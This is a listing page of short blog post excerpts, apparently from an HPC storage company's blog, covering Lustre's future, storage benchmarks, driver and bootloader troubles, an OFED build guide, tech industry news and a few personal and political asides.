This took guts. The (new) CEO of Nokia noting that there are issues going forward. Nokia has had great handsets. I still recall with great fondness, the E61 that I left in a taxi somewhere in London after visiting a customer … But Nokia hasn’t innovated in a meaningful way, hasn’t adapted well to the rapid change in market conditions. Like RIM, their phones are competent, excellent phones. Unlike Apple and Google/Android, their phones don’t have a great user experience.
Posts
Physics humor for a Friday morning ...
From xkcd Heh … If you don’t know what a complex conjugate is, read this. Basically, if I have a function Ψ(x) which has a “real” part ψr(x) and an imaginary part ψi(x), with the ψ’s being real valued functions, so Ψ(x) = ψr(x) +iψi(x)), then multiplying Ψ(x) by its complex conjugate (Ψ(x) = ψr(x) - i*ψi(x) , where i =√(-1) ) yields:
(ψr(x) + i*ψi(x)) * (ψr(x) - i*ψi(x))
Posts
fun with SCSI targets
Had some fun today with our SCSI target. Its a very nice system, very powerful. Not terribly easy to use. But it works well. We have tools we developed around it to make it easy to use. Creating iSCSI targets works nicely with our target code. It builds the target, sets up the infrastructure. Done with thin provisioning, its pretty fast and mostly painless. Well, it was until we discovered that the stack, while including /etc/initiators.
Posts
... and Lustre sporks ...
A spork is a cross between a spoon and a fork. Of course there is a double entendre buried in their, as spoon (or spooning) implies a close relationship, and a fork (or forking) implies a split from an original. I think Lustre is sporking. Seriously. And this is a good thing for Lustre (as the major forces behind it are aligning, and still bending over backwords to avoid using the dreaded “f”-word).
Posts
Semi-OT: No ... really ... no ...
This is an economic thing. If I sell my house, in my suburban neighborhood, and I make a profit from that activity, should I be required to share my profit with my neighbors, who don’t own my house? The answer to this is, obviously not. If my business makes money, and makes a profit, should I be required to share my profit with others, who don’t own a portion of my business?
Posts
And yet again ...
Me: (presents A) “So what do you think?” Them: “Hmmm … nice but what comes after A?” Me: “Lets get another time slot and I’ll go over that” (time passes … order of weeks) Me: (presents post-A) “So what do you think” Them: “Hmmm … nice but what comes after post-A?” Me: “Lets get another time slot and I’ll go over that” (time passes … order of several months, lets call B as post post-A, and we hit important business milestones) Me: (presents B) “So what do you think” Them: “Hmmm … nice but what about A?
Posts
OT: First good legislation of the year; Get rid of the onerous 1099 stuff from Obamacare
Looks like the amendment passed. This provision would have required that we keep records of every transaction above $600 in terms of 1099 forms. So if I go buy tickets for a business trip on LinkedIn, I have to fill out some 1099 bits (and so do they). If someone buys more than $600 of stuff from us, an exchange of 1099 info. Yeah. It was really dumb, and it shouldn’t have been in Obamacare.
Posts
If you can't beat em, copy em ...
Google catches Microsoft with its proverbial hand in the (search) cookie jar … Microsoft’s non-denial denial reads not unlike a Monty Python skit I am fond of. Search for “bat”. “No we didn’t!!!” then “Well, what we meant was ….” heh! That takes cajones!
Posts
2010: Day job's best year on record, ever
Just finished an analysis of last years results. We are a private company, so we don’t release financial info (apart from potential investors and those looking to take a stake in the company). We hit 11.7% growth in revenue for the year, and hit a company all time high revenue. This is despite a rather challenging economic environment (to say the least). Costs rose, some … er … astoundingly so. Looking to build on this, and accelerate forward.
Posts
Are HPC cloud users expectations realistic?
Several years ago, before clouds were all the rage, we were working with a large customer discussing an “on-demand” HPC computing service. This service predated Amazon’s setup, and was more in line with what Sabalcore, CRL and others are doing. I remember distinctly from my conversations with the customer that they had particular desires. Specifically, they wanted to run on always the latest/greatest/fastest possible hardware, and not pay any more for this.
Posts
Throwing signs
Too funny:
[ ](http://scalability.org/images/geekgangsignsmain11-450x311.jpg)
[had to update, as the folks putting the image up started blocking our link back to them … I thought we did this correctly … wasn’t trying to steal bandwidth]
Posts
Oh what a day
No details, but this is the sort of day I can do without in terms of excitement. Tonight is fight night in karate. Maybe I can suit up and hit with my good hand. Yeah, its been one of those days.
Posts
As the high performance storage world evolves ...
Last year, say July time frame, if you asked me to name the top high performance computing file systems, and prognosticate who the up and comers were … well, you’d get lists much like I’ve said here in the past. Lustre was the “king” and undisputed leader. pNFS was (sorry Bruce and team) effectively perpetually in the future (yeah, sort of like Perl6 … though we intend to play with both sometime soon … I hope).
Posts
My kingdom for good error messages ... or something like that
I just spent too long tearing my (altogether far too few remaining) hair(s) out over a driver issue. Qlogic 7240 IB card. Decent DDR unit. Our 2.6.32.22 kernel. Very stable kernel. Rock solid under ridiculous load. OFED 1.5.2 with all the nice bug fixes etc. And inserting/removing qib would cause all manner of kernel hiccups. So much for stability. Well, that is, as long as the ib_ipath.ko, from the kernel RPM, was in there.
Posts
There are times that this is amusing ... other times, not so much
Customer: Must be something wrong with your gear, because we know what we are doing. Me: Er … (noting that something that was working correctly before they touched it, is no longer working) … ok … so what changes have you made? Customer: Changes? We haven’t changed anything! Me: Er … but it was working, then it stopped working. So what changed? Customer: We just altered the network Me: Ok, now we are onto something (and likely the reason why the “equipment is broken") Customer: But we didn’t break it … Me: Yes, I understand.
Posts
Interesting observation with respect to the poll
I’ve been monitoring the IP addresses and logs on the poll voting. You can vote for more than one item, select several, hit vote, and it generates a cookie so that you won’t be able to vote again. That is, unless you take the explicit step of clearing this cookie. And voting again. What this is telling me is that people feel a need not to simply report their (possibly multiple) preferences … but instead to actively game an informal measurement system.
Posts
Eric Schmidt out in April as CEO of google
See here. Larry Page (U of Mich alum … woot!*) More power to Larry (and all the other co-founders out there with vision and a desire to get the job done). Don’t forget to grow some data center bits here … its really cold right now … no need to spend on cooling for like 6 months out of the year! (not to mention, we have some nice servers we can customize for you!
Posts
Day job: new website about to go up
We’ve been busy. Real busy. Did I mention we’ve been busy? Once the website rolls, please, by all means, let us know if somethings broke. Email works. Hopefully we won’t melt the server … [Update] Doug rocks. In case I didn’t mention it. He rocks! Sites up with minor breakage (modulo grammar, inconsistent numbers … ) May need a site breakage bounty. Gonna think about this ….
Posts
Call it what it is
Saw this on /.
Paraphrasing Shakespeare, a fork by any other name … Look … I appreciate that no one wants to call this a fork. Oracle has seemingly abandoned the project and is shopping ownership of the IP around. The choices ahead of the community are find someone to buy the IP, and rally to their leadership, ignore the IP, rename the project and fork it. You could always pretend that the IP isn’t an issue, that no fork is needed, and then have to do some serious rhetorical contortions to explain why your release isn’t a fork.
Posts
Interesting poll on Lustre futures
See here on LinkedIn. In case you can’t see it, the premise of the question is “Would you buy storage based on Lustre”, and it specifically points to Rich B’s article at InsideHPC. Choices are
Yes, still Lustre No, I’d choose Panasas No, I’d choose GPFS No, I’d choose Gluster No, another solution Its a small, self selecting, and probably badly biased sample, but whats interesting is that about 20% each seem like they would choose Lustre, Panasas, or another solution and about 40% would choose GPFS, with no one choosing Gluster.
Posts
Its nice to see people seeing what we've been predicting
I could pat my own back on this … no really, I could. Wouldn’t be hard. I’ve been talking for a long time about how the HPC market will likely evolve. Hidden within this is how to grow as a business … serving this need. We’ve been predicting that the cloud HPC model will reduce the number of new clusters deployed. Basically, acquisition costs for running a cluster are large, as well as the lifetime costs.
Posts
OT: Ouch !
Not that cnbc is the bastion of correct/reliable/accurate reporting, but this article definitely hurts. The “American dream” has been to own your own house. We bought ours 13 years ago, with a 30 year mortgage. Refinanced 6 years ago to a 20 year mortgage, with the same payments. We assumed the value of the house would be increasing or at worst, staying the same. Last I checked on a few real estate sites, we are “underwater or upside-down” on the mortgage.
Posts
Worth asking again ... does Lustre have a future?
This is going to sound like a strange question to ask. Yes … I know it is a strange question to ask given the events of the past few months. A long while ago, I postulated that Lustre’s future was (no pun intended) cloudy at best. That Sun/Oracle had an uncertain level of commitment to it, and Larry Ellison is a business man, and doesn’t run a charity … there aren’t any freebees he is likely to fund forever.
Posts
I had read it right ...
A partner was working with us on an opportunity. At some point in the process, the customer tripped my alarms. This was going well into 2x4 material (e.g. our proposal wasn’t going to be seriously considered). I shared my thoughts with the partner. They wanted to press ahead. Sure enough, we got word of our 2x4-ness today. Nice to know we helped a customer beat a competitor up. Well, no, not really.
Posts
The bandwidth wall: aka a 19.2 TB write sprint; how fast can your storage do it?
[root@jr5-lab ~]# fio sw.fio Run status group 0 (all jobs): WRITE: io=19,200GB, aggrb=2,323MB/s, minb=2,379MB/s, maxb=2,379MB/s, mint=8463222msec, maxt=8463222msec Thats 8463.2 seconds to you and me. 2.351 hours. 8.17TB/hour And we didn’t even fill the unit up. This is what we mean by a low bandwidth wall. You can conceivably read/write the entire storage in a time comparable to single hours. If your platform can’t handle this (and most can’t), then you have a very high wall erected between you and your data.
Posts
Lab JR5 quickie benchmarks
I’ve seen some clustered file system results a few months ago where the vendor was happy to sustain something like 1.4 GB/s during their IO operations, and called this good. Something like 60 disks. Lustre, and some other bits. Their approach (and most people’s approach) in this space is to start with a bunch of demonstratably slow servers/disks, and aggregate them. Which eventually gets you to the performance you are looking for, albeit with low performance density, large expenditure of capital, large investment in space/power/cooling.
Posts
Interesting (re)entre into the deskside/server side
I had expected NVidia to do something. AMD and Fusion. Intel with AVX(Larabee, et al.) and integrated video. NVidia had to either develop its own processor, buy a design/company, or fight a battle in the future it would likely lose … not due to the quality of the competitors or their parts, but simply because the deck was stacked against it. Their direction is interesting. Going ARM and a fusion like thing as a CPU + GPU (though I doubt they will call it an APU … they are all about the APU … where A==G).
Posts
As good as my 2x4 detector is, it's still not perfect
We don’t like being used as a 2x4 (two-by-four) … basically a heavy chunk of wood used to beat someone into submission. Some of the surest signs of 2x4-dom are when we are asked for an onsite loaner. The theory behind this is supposed to be that a customer will evaluate a unit in their environment, give it a rigorous going over, and then make a purchase decision based upon that.
Posts
Churchillian thoughts .... about grub
Ahh … grub. That boot loader. The one that … after interacting with … you wish you didn’t have to. Just had some fun a few minutes ago on a Lustre upgrade. Some of the grub tools are slightly broken, many are horribly, irretrievably borked. And they will do bad things to you. To your disk. Paraphrasing Churchill, grub is the worst bootloader, except for all the rest. I’ll argue that its marginally better than lilo.
Posts
Projects for the new year ...
Some near term … some far term. Pragmatic projects:
Dust. Almost to the point where I am happy releasing it. Will have ~6 driver packs, a spec, a user tool, and a roadmap when I am done. Think of it as a DKMS that works, and what it could have been. Lustre. We have operational Lustre builds from the git tree, though these are 2.x builds, and not 1.8.x builds.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory as root on your machine mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h Then run the build_new.sh. Voila. Works. Binary RPMs are here.